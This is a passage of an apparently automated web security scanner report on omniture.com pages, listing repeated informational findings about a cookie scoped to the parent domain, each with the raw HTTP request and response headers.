<title>Landing Page Optimization: How
...[SNIP]...

11.461. http://www.omniture.com/offer/411 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/411

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/411 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:05 GMT
Content-Length: 14658
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Merchandising Product
...[SNIP]...

11.462. http://www.omniture.com/offer/412 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/412

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/412 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:07 GMT
Content-Length: 14313
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:07 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Guess Shopper Engagement and Si
...[SNIP]...

11.463. http://www.omniture.com/offer/413 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/413

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:06 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/413 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:06 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:06 GMT
Content-Length: 14330
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:06 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>10 Best Practices for Online Me
...[SNIP]...

11.464. http://www.omniture.com/offer/427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/427

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:43 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/427 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:24:43 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:24:43 GMT
Content-Length: 14491
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:43 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Is Your SEO Guy Using Facebook?
...[SNIP]...

11.465. http://www.omniture.com/offer/429 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/429

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:25:23 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/429 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:25:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:25:23 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:25:24 GMT
Content-Length: 15284
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:25:23 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Measure and Monetize Online Vid
...[SNIP]...

11.466. http://www.omniture.com/offer/435 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/435

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/435 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:27:11 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:27:11 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:27:11 GMT
Content-Length: 13463
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:11 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Insight Demo | Omnitur
...[SNIP]...

11.467. http://www.omniture.com/offer/462 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/462

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/462 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:08 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:08 GMT
Content-Length: 14122
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:08 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Recommendations: Promo
...[SNIP]...

11.468. http://www.omniture.com/offer/704 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/704

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/704 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:32:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:32:19 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:32:19 GMT
Content-Length: 13705
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:19 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>2009 Search and Email Highlight
...[SNIP]...

11.469. http://www.omniture.com/offer/892 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/892

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:51 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/892 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:24:51 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:24:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:24:52 GMT
Content-Length: 14043
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Timex uses Omniture SearchCente
...[SNIP]...

11.470. http://www.omniture.com/offer/987 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/987

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/987 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:59:11 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:59:11 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:59:12 GMT
Content-Length: 14737
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:11 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe.. Search&Promote: Drive R
...[SNIP]...

11.471. http://www.omniture.com/offer/989 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/989

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:05:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/989 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:05:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:05:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:05:35 GMT
Content-Length: 13584
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:05:35 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Search&Promote Success St
...[SNIP]...

11.472. http://www.omniture.com/press/867 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/867

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press/867 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:59:04 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:59:04 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:59:04 GMT
Content-Length: 32219
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:04 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press Detail: New Adob
...[SNIP]...

11.473. http://www.omniture.com/press/868 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/868

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press/868 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:59:02 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:59:02 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:59:03 GMT
Content-Length: 32129
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:02 GMT; path=/; domain=omniture.com

